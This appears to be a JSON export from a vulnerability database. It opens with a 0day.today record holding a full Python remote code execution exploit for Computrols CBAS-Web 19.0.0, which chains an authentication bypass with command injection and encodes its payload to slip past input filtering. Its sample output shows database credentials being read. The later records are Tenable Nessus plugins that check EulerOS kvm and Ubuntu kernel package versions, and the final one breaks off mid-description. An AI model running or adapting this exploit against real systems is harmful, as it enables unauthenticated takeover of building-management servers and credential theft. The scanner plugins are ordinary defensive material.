{"zdt": [{"lastseen": "2019-12-04T02:04:53", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2019-11-12T00:00:00", "published": "2019-11-12T00:00:00", "id": "1337DAY-ID-33501", "href": "https://0day.today/exploit/description/33501", "title": "CBAS-Web 19.0.0 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "# Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/\r\n# Software Link: https://www.computrols.com/building-automation-software/\r\n# Version: 19.0.0\r\n# Tested on: NA\r\n# CVE : N/A\r\n# Advisory: https://applied-risk.com/resources/ar-2019-009\r\n# Paper: https://applied-risk.com/resources/i-own-your-building-management-system\r\n\r\n#!/usr/bin/env python\r\n\r\n'''\r\n Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit\r\n Affected versions: 19.0.0 and below\r\n by Sipke Mellema, 2019\r\n\r\n\r\n Uses two vulnerabilities for executing commands:\r\n - An authorization bypass in the auth module (CVE-2019-10853)\r\n - A code execution vulnerability in the json.php endpoint (CVE-2019-10854)\r\n \r\n Example usage: \r\n $ python CBASWeb_19_rce.py 192.168.1.250 \"cat /var/www/cbas-19.0.0/includes/db.php\"\r\n ------------==[CBAS Web v19 Remote Command Injection\r\n\r\n [*] URL: http://192.168.1.250/\r\n [*] Executing: cat /var/www/cbas-19.0.0/includes/db.php\r\n [*] Cookie is authenticated\r\n [*] Creating Python payload..\r\n [*] Sending Python payload..\r\n [*] Server says:\r\n <?php\r\n // Base functions for database access\r\n // Expects a number of constants to be set. 
Set settings.php\r\n\r\n // Only allow local access to the database for security purposes\r\n if(defined('WINDOWS') && WINDOWS){\r\n define('MYSQL_HOST', '192.168.1.2');\r\n define('DB_USER', 'wauser');\r\n define('DB_PASS', 'wapwstandard');\r\n /*define('DB_USER', 'root');\r\n define('DB_PASS', 'souper secrit');*/\r\n ...\r\n\r\n'''\r\n\r\nimport requests\r\nimport sys\r\nimport base64 as b\r\nimport json\r\n\r\n\r\ndef debug_print(msg, level=0):\r\n if level == 0:\r\n print \"[*] %s\" % msg\r\n if level == 1:\r\n print \"[-] %s\" % msg\r\n\r\n# Check parameters\r\nif len(sys.argv) < 3:\r\n print \"Missing target parameter\\n\\n\\tUsage: %s <IP or hostname> \\\"<cmd>\\\"\" % __file__\r\n exit(0)\r\n\r\nprint \"------------==[CBAS Web v18 Remote Command Injection\\n\"\r\n\r\n# Set host, cookie and URL\r\nhost = sys.argv[1]\r\ncookies = {'PHPSESSID': 'comparemetoasummersday'}\r\nurl = \"http://%s/\" % host\r\n\r\ndebug_print(\"URL: %s\" % url)\r\n\r\n# Command to execute\r\n# Only use single quotes in cmd pls\r\nicmd = sys.argv[2]\r\nif '\"' in icmd:\r\n debug_print(\"Please don't use double quotes in your command string\", level = 1)\r\n exit(0)\r\n\r\ndebug_print(\"Executing: %s\" % icmd)\r\n\r\n# URL for performing auth bypass by setting the auth cookie flag to true\r\nauth_bypass_req = \"cbas/index.php?m=auth&a=agg_post&code=test\"\r\n# URL for removing auth flag from cookie (for clean-up)\r\nlogout_sess_req = \"cbas/index.php?m=auth&a=logout\"\r\n# URL for command injection and session validity checking\r\njson_checks_req = \"cbas/json.php\"\r\n\r\n# Perform logout\r\ndef do_logout():\r\n requests.get(url + logout_sess_req, cookies = cookies)\r\n\r\n# Check if out cookie has the authentication flag\r\ndef has_auth():\r\n ret = requests.get(url + json_checks_req, cookies = cookies)\r\n if ret.text == \"Access Forbidden\":\r\n return False\r\n return True\r\n\r\n# Set auth flag on cookie\r\ndef set_auth():\r\n requests.get(url + auth_bypass_req, cookies = 
cookies)\r\n\r\n# =======================================================\r\n\r\n# Perform auth bypass if not authenticated yet\r\nif not has_auth():\r\n debug_print(\"Cookie not yet authenticated\")\r\n debug_print(\"Setting auth flag on cookie via auth bypass..\")\r\n set_auth()\r\n\r\n# Check if bypass failed\r\nif not has_auth():\r\n debug_print(\"Was not able to perform authorization bypass :(\")\r\n debug_print(\"Exploit failed, quitting..\", level = 1)\r\n exit(0)\r\n\r\nelse:\r\n debug_print(\"Cookie is authenticated\")\r\n debug_print(\"Creating Python payload..\")\r\n\r\n # Payload has to be encoded because the server uses the following filtering in exectools.php:\r\n # $bad = array(\"..\", \"\\\\\", \"&\", \"|\", \";\", '/', '>', '<');\r\n # So no slashes, etc. This means only two \"'layers' of quotes\"\r\n \r\n # Create python code exec code\r\n cmd_python = 'import os; os.system(\"%s\")' % icmd\r\n # Convert to Python array\r\n cmd_array_string = str([ord(x) for x in cmd_python])\r\n # Create command injection string\r\n p_unencoded = \"DispatchHistoryQuery\\t-i \\\"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\\\"\" % cmd_array_string\r\n # Base64 encode for p parameter\r\n p_encoded = b.b64encode(p_unencoded)\r\n\r\n # Execute command\r\n debug_print(\"Sending Python payload..\")\r\n ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded})\r\n\r\n # Parse result\r\n ret_parsed = json.loads(ret.text)\r\n try:\r\n metadata = ret_parsed[\"metadata\"]\r\n identifier = metadata[\"identifier\"]\r\n\r\n debug_print(\"Server says:\")\r\n print identifier\r\n\r\n # JSON Parsing error\r\n except:\r\n debug_print(\"Error parsing result from server :(\", level = 1)\r\n\r\n# Uncomment if you want the cookie to be removed after use\r\n# debug_print(\"Logging out\")\r\n# do_logout()\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33501"}], "nessus": 
[{"lastseen": "2019-11-01T02:06:28", "bulletinFamily": "scanner", "description": "According to the versions of the kvm package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The msr_mtrr_valid function in arch/x86/kvm/mtrr.c in\n the Linux kernel before 4.6.1 supports MSR 0x2f8, which\n allows guest OS users to read or write to the\n kvm_arch_vcpu data structure, and consequently obtain\n sensitive information or cause a denial of service\n (system crash), via a crafted ioctl\n call.(CVE-2016-3713)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support is vulnerable to a null\n pointer dereference flaw. It could occur on x86\n platform, when emulating an undefined instruction. An\n attacker could use this flaw to crash the host kernel\n resulting in DoS.(CVE-2016-8630)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support was vulnerable to an\n incorrect segment selector(SS) value error. The error\n could occur while loading values into the SS register\n in long mode. A user or process inside a guest could\n use this flaw to crash the guest, resulting in DoS or\n potentially escalate their privileges inside the\n guest.(CVE-2017-2583)\n\n - arch/x86/kvm/emulate.c in the Linux kernel through\n 4.9.3 allows local users to obtain sensitive\n information from kernel memory or cause a denial of\n service (use-after-free) via a crafted application that\n leverages instruction emulation for fxrstor, fxsave,\n sgdt, and sidt.(CVE-2017-2584)\n\n - A reachable assertion failure flaw was found in the\n Linux kernel built with KVM virtualisation(CONFIG_KVM)\n support with Virtual Function I/O feature (CONFIG_VFIO)\n enabled. 
This failure could occur if a malicious guest\n device sent a virtual interrupt (guest IRQ) with a\n larger (>1024) index value.(CVE-2017-1000252)\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of instructions (a commonly used performance\n optimization). There are three primary variants of the\n issue which differ in the way the speculative execution\n can be exploited. Variant CVE-2017-5715 triggers the\n speculative execution by utilizing branch target\n injection. It relies on the presence of a\n precisely-defined instruction sequence in the\n privileged code as well as the fact that memory\n accesses may cause allocation into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1450.NASL", "href": "https://www.tenable.com/plugins/nessus/124953", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kvm (EulerOS-SA-2019-1450)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124953);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/11 12:05:35\");\n\n script_cve_id(\n \"CVE-2016-3713\",\n \"CVE-2016-8630\",\n \"CVE-2017-1000252\",\n \"CVE-2017-17741\",\n \"CVE-2017-2583\",\n \"CVE-2017-2584\",\n \"CVE-2017-5715\",\n \"CVE-2017-7518\",\n \"CVE-2018-10853\",\n \"CVE-2018-3639\",\n \"CVE-2019-6974\",\n \"CVE-2019-7221\",\n \"CVE-2019-7222\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kvm (EulerOS-SA-2019-1450)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kvm package installed, the EulerOS\nVirtualization installation on the remote host is affected 
by the\nfollowing vulnerabilities :\n\n - The msr_mtrr_valid function in arch/x86/kvm/mtrr.c in\n the Linux kernel before 4.6.1 supports MSR 0x2f8, which\n allows guest OS users to read or write to the\n kvm_arch_vcpu data structure, and consequently obtain\n sensitive information or cause a denial of service\n (system crash), via a crafted ioctl\n call.(CVE-2016-3713)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support is vulnerable to a null\n pointer dereference flaw. It could occur on x86\n platform, when emulating an undefined instruction. An\n attacker could use this flaw to crash the host kernel\n resulting in DoS.(CVE-2016-8630)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support was vulnerable to an\n incorrect segment selector(SS) value error. The error\n could occur while loading values into the SS register\n in long mode. A user or process inside a guest could\n use this flaw to crash the guest, resulting in DoS or\n potentially escalate their privileges inside the\n guest.(CVE-2017-2583)\n\n - arch/x86/kvm/emulate.c in the Linux kernel through\n 4.9.3 allows local users to obtain sensitive\n information from kernel memory or cause a denial of\n service (use-after-free) via a crafted application that\n leverages instruction emulation for fxrstor, fxsave,\n sgdt, and sidt.(CVE-2017-2584)\n\n - A reachable assertion failure flaw was found in the\n Linux kernel built with KVM virtualisation(CONFIG_KVM)\n support with Virtual Function I/O feature (CONFIG_VFIO)\n enabled. This failure could occur if a malicious guest\n device sent a virtual interrupt (guest IRQ) with a\n larger (>1024) index value.(CVE-2017-1000252)\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of instructions (a commonly used performance\n optimization). 
There are three primary variants of the\n issue which differ in the way the speculative execution\n can be exploited. Variant CVE-2017-5715 triggers the\n speculative execution by utilizing branch target\n injection. It relies on the presence of a\n precisely-defined instruction sequence in the\n privileged code as well as the fact that memory\n accesses may cause allocation into the microprocessor's\n data cache even for speculatively executed instructions\n that never actually commit (retire). As a result, an\n unprivileged attacker could use this flaw to cross the\n syscall and guest/host boundaries and read privileged\n memory by conducting targeted cache side-channel\n attacks.(CVE-2017-5715)\n\n - A flaw was found in the way the Linux KVM module\n processed the trap flag(TF) bit in EFLAGS during\n emulation of the syscall instruction, which leads to a\n debug exception(#DB) being raised in the guest stack. A\n user/process inside a guest could use this flaw to\n potentially escalate their privileges inside the guest.\n Linux guests are not affected by this.(CVE-2017-7518)\n\n - Linux kernel compiled with the KVM virtualization\n (CONFIG_KVM) support is vulnerable to an out-of-bounds\n read access issue. It could occur when emulating vmcall\n instructions invoked by a guest. 
A guest user/process\n could use this flaw to disclose kernel memory\n bytes.(CVE-2017-17741)\n\n - Systems with microprocessors utilizing speculative\n execution and speculative execution of memory reads\n before the addresses of all prior memory writes are\n known may allow unauthorized disclosure of information\n to an attacker with local user access via a\n side-channel analysis, aka Speculative Store Bypass\n (SSB), Variant 4.(CVE-2018-3639)\n\n - kernel: kvm: guest userspace to guest kernel\n write(CVE-2018-10853)\n\n - In the Linux kernel before 4.20.8,\n kvm_ioctl_create_device in virt/kvm/kvm_main.c\n mishandles reference counting because of a race\n condition, leading to a use-after-free.(CVE-2019-6974)\n\n - The KVM implementation in the Linux kernel through\n 4.20.5 has an Information Leak.(CVE-2019-7222)\n\n - The KVM implementation in the Linux kernel through\n 4.20.5 has a Use-after-Free.(CVE-2019-7221)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1450\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3d6cefe5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kvm packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kvm-4.4.11-30.011\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kvm\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:34:33", "bulletinFamily": "scanner", "description": "Jann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. 
(CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3777-1.NASL", "href": "https://www.tenable.com/plugins/nessus/117872", "published": "2018-10-02T00:00:00", "title": "Ubuntu 18.04 LTS : linux, linux-aws, linux-gcp, linux-kvm, linux-oem, linux-raspi2 vulnerabilities (USN-3777-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3777-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117872);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_xref(name:\"USN\", value:\"3777-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS : linux, linux-aws, linux-gcp, linux-kvm, linux-oem, linux-raspi2 vulnerabilities (USN-3777-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. 
(CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3777-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3777-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1021-gcp\", pkgver:\"4.15.0-1021.22\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1021-oem\", pkgver:\"4.15.0-1021.24\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1023-aws\", pkgver:\"4.15.0-1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1023-kvm\", pkgver:\"4.15.0-1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1024-raspi2\", pkgver:\"4.15.0-1024.26\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-36-generic\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-36-generic-lpae\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-36-lowlatency\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", 
pkgname:\"linux-image-4.15.0-36-snapdragon\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-aws\", pkgver:\"4.15.0.1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic\", pkgver:\"4.15.0.36.38\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.15.0.36.38\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.15.0.1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.15.0.36.38\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.15.0.1024.22\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.15.0.36.38\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-aws / linux-image-4.15-gcp / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-11-03T12:34:46", "bulletinFamily": "scanner", "description": "USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. 
